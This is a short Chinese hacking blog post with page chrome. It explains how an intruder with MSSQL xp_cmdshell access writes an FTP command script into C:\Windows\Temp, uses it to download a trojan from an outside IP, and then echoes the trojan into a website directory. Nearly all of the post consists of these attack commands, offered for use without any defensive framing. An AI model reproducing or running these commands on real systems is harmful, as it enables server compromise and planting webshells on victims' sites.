Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
lsh4ckLsh4ck  2018-12-21 13:24 lsh4ck's Blog 隐藏边栏 |   抢沙发  689 
文章评分 0 次,平均分 0.0

情况较为特殊,只有目录C:\Windows\Temp\,有上传权限:

 

Exec master.dbo.xp_cmdshell 'cd C:\Windows\Temp'
Exec master.dbo.xp_cmdshell 'echo open ip地址 >>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo 账户>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo 密码>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo bin>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo get 文件名称>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo bye>>C:\Windows\Temp\8.txt'

这里下载的文件默认下载到c:\user\你当前用户名 目录下方,但是这个目录没可写。即便下载了也没戏,因为根本没存进去。

于是接着执行,(先cd到可执行目录,然后在执行ftp,这样就下载到了指定的目录。)
cd C:\Windows\Temp\&ftp -s:C:\Windows\Temp\8.txt

木马下载到 C:\Windows\Temp\ 目录里面。
然后echo 木马到网站目录的时候格式
"<你的木马><" >>输出的路径+文件名



本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

lsh4ck
Lsh4ck 关注:0    粉丝:7
这个人很懒,什么都没写
×

予人玫瑰,手有余香

打赏 Lsh4ck

打开支付宝扫一扫,即可进行扫码打赏哦

发表评论

表情 链接 私密 格式 签到

扫一扫二维码分享

无觅相关文章插件,快速提升流量